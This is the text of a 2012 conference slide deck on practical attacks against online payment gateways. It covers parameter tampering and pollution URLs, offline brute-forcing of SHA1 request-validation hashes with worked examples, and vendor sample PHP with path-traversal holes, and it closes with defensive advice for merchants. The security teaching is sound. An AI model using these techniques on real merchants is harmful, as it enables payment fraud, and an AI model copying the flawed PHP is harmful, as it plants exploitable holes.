![Page 1: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/1.jpg)
1
Practical attacks on payment gatewaysand associated functionality
Ruxcon 2012, Melbourne
Eldar Marcussen, Stratsec
![Page 2: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/2.jpg)
![Page 3: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/3.jpg)
3
Agenda
• Introduction• Payment gateways• Weaknesses• Attacks• Conclusion
![Page 4: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/4.jpg)
4
Introduction
![Page 5: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/5.jpg)
5
Introduction
A payment gateway is an e-commerce application service provider service that authorizes payments online. It is the equivalent of a physical point of sale terminal. Payment gateways protect credit card details by encrypting sensitive information, such as credit card numbers, to ensure that information is passed securely between the customer and the merchant and also between merchant and the payment processor.
![Page 6: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/6.jpg)
6
@Wireghoul
• Penetration tester• Father• Husband• Geek• Blogger
![Page 7: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/7.jpg)
7
“Bad guys” have an end game:
• Fraudulent transactions– Not paying for goods/services– Paying very little for goods/services
• Steal credit cards– Always popular– Easy to convert into cash
![Page 8: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/8.jpg)
8
Payment gateways are:
• Easy to use!– Iframe shopping carts– Transaction details in url
• Supports developers!– Documentation– Source code
• Secure!– PCI compliant– Request Validation aka “Tamper proof”– Use SSL
![Page 9: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/9.jpg)
9
Testing payment gateways
• Out of penetration testing scope• Test data
– Use test credit card numbers
VISA 4111 1111 1111 1111
Mastercard 5555 5555 5555 4444
American Express 378282246310005
![Page 10: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/10.jpg)
10
Transaction diagram
Payment Gateway
Merchant Website
Browser
![Page 11: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/11.jpg)
11
From the trenches
• What have we seen in “the wild”:– Cross site scripting– Information disclosure– Directory traversal– Negative numbers– Exposure of credit card numbers– Configuration issues– Insecure file uploads– More
![Page 12: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/12.jpg)
12
Basic attacks
• Tamper to change payment amount• Tamper to change currency• Tamper to change return url• Spoof transaction complete
![Page 13: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/13.jpg)
13
Transaction diagram
Merchant Website
Payment Gateway
Browser
![Page 14: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/14.jpg)
14
Basic attacks
• Tamper to change payment amount• Tamper to change currency• Tamper to change return url• Spoof transaction complete
• Solved with request validation
![Page 15: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/15.jpg)
15
Vendor resources
![Page 16: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/16.jpg)
16
Using Vendor resources
• Identify vulnerabilities based on vendor resources– Documentation– Example source code– API Libraries– Shopping cart code
![Page 17: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/17.jpg)
17
Vendor resources – Example code<?php/** Constants */$customer_data_dir = "/var/tmp";
$customer_ref = $_POST["customer_ref"];$subscription_ref = $_POST["subscription_ref"];
if($customer_ref == null) { header("HTTP/1.0 404 Not Found");} else { $customer_data = fopen("$customer_data_dir/$customer_ref.txt", "w") or die("Can't open file."); fwrite($customer_data, $subscription_ref); fclose($customer_data);}?>
![Page 18: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/18.jpg)
18
Vendor resources – Example code
<?php/** Constants */$customer_data_dir = "/var/tmp";
$customer_ref = $_POST["customer_ref"];
if($customer_ref == null) { header("HTTP/1.0 404 Not Found");} else { unlink("$customer_data_dir/$customer_ref.txt")}?>
![Page 19: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/19.jpg)
19
Vendor resources – Shopping carts
34%
27%
23%
4%
6%
3%2% 2%
SQL Injection
Cross site scripting
Other
File inclusion
Information disclosure
Traversal
CSRF
Buffer Overflow
![Page 20: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/20.jpg)
20
Vendor resources – Shopping carts
• Transaction complete with incomplete payment – (SA-CONTRIB-2010-064)
• Price manipulation (OSVDB-32192, 38368, 11429, 11430, 11431 + many others)
• Remote command/code execution• Authentication bypass• Customer database exposure• Abritrary file upload• Format string
![Page 21: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/21.jpg)
21
Vendor resources – Shopping carts
• Use SSL … right?
![Page 22: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/22.jpg)
22
Request validation
![Page 23: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/23.jpg)
23
Request validation
To validate the request of the payment page result, signed request is often used - which is the result of the hash function in which the parameters of an application confirmed by a «secret word», known only to the merchant and payment gateway. -- Wikipedia
![Page 24: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/24.jpg)
24
Defeating request validation
• Bypass request validation• Attacking the hashing algorithm• Attack the request validation itself
![Page 25: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/25.jpg)
25
Bypassing request validation
• HTTP Parameter Pollutionhttps://url/pay?amount=100.00&amount=0.01• Abusing unprotected parametershttps://url/pay?expiry_date=31/12/2099• Abusing application logichttps://url/pay?pre_auth=1
![Page 26: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/26.jpg)
26
Attacking request validation
• Hashing algorithm attacks– MD5 hash length attack
• Hash mismatch behavior– Redirects to attacker supplied url
![Page 27: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/27.jpg)
27
Breaking request validation
• Brute force attacks– Known plaintext– Weak entropy due to text transform of secret– Can be done offline– Without completing a transaction
![Page 28: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/28.jpg)
28
Brute force request validation - Example
SHA1 of "EPS_MERCHANTID|Password|EPS_TXNTYPE|EPS_REFERENCEID|EPS_AMOUNT|EPS_TIMESTAMP"
sha1('ABC0010|password123|0|Test Reference|100.00|20120916221931')
6bec095d6df852d236bc1985f2d5d73009af68a5
![Page 29: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/29.jpg)
29
Brute force request validation - Example
<input hidden EPS_MERCHANT = “ABC0010"> <input hidden EPS_TXNTYPE = "0"> <input hidden EPS_REFERENCEID ="Test Reference"> <input hidden EPS_AMOUNT ="100.00"> <input hidden EPS_TIMESTAMP ="20120916221931"> <input hidden EPS_FINGERPRINT =" 6bec095d6df852d236bc1985f2d5d73009af68a5"> <input hidden EPS_RESULTURL = “https://www.merchantsite.com/”>
![Page 30: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/30.jpg)
30
Brute force request validation - Example
Fingerprint
EPS_MERCHANTID
Password
EPS_TXNTYPE
EPS_REFERENCEID
EPS_AMOUNT
EPS_TIMESTAMP
![Page 31: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/31.jpg)
31
Brute force request validation - Example
Fingerprint Web form
EPS_MERCHANTID EPS_MERCHANT
Password
EPS_TXNTYPE EPS_TXNTYPE
EPS_REFERENCEID EPS_REFERENCEID
EPS_AMOUNT EPS_AMOUNT
EPS_TIMESTAMP EPS_TIMESTAMP
EPS_FINGERPRINT
![Page 32: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/32.jpg)
32
Brute force request validation - Example
Fingerprint Web form
EPS_MERCHANTID EPS_MERCHANT
Password
EPS_TXNTYPE EPS_TXNTYPE
EPS_REFERENCEID EPS_REFERENCEID
EPS_AMOUNT EPS_AMOUNT
EPS_TIMESTAMP EPS_TIMESTAMP
EPS_FINGERPRINT
![Page 33: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/33.jpg)
33
Brute force request validation - Example
Password is usually:• Vendor supplied• User specified• No change requirements• Sometimes converted to upper/lower-case• [a-zA-Z0-9]{8}• [a-z0-9]{8}• .{8}• [0-9a-f]^32
![Page 34: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/34.jpg)
34
Breaking request validation
• Once we have broken request validation we can– Perform SQLi attack– Alter cost– Alter currency– Spoof payment received signatures
![Page 35: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/35.jpg)
35
Breaking response validation
• A string used to validate the transaction output.
• SHA1 hash of:EPS_MERCHANTID|Password|EPS_REFERENCEID|EPS_AMOUNT|EPS_TIMESTAMP|EPS_SUMMARYCODEsha1('ABC0010|password123|Test Reference|100.00|20120916221931|1')
633c32a13e87e5f538f5521501013ffe44dc66b3
![Page 36: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/36.jpg)
36
DEMO
![Page 37: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/37.jpg)
37
Conclusion
• Don’t rely on the browser to drive traffic between the merchant website and the payment gateway
• Always validate the transaction amount and payment status in a secondary request using API before considering a transaction complete
• Wait for payment to clear before shipping goods• Use more than one unknown variable in request
validation• Weak request validation does not equal a
vulnerability
![Page 38: 1 Practical attacks on payment gateways and associated functionality Ruxcon 2012, Melbourne Eldar Marcussen, Stratsec](https://reader037.vdocument.in/reader037/viewer/2022103112/551aff3f5503465e7d8b5671/html5/thumbnails/38.jpg)
38
Questions
???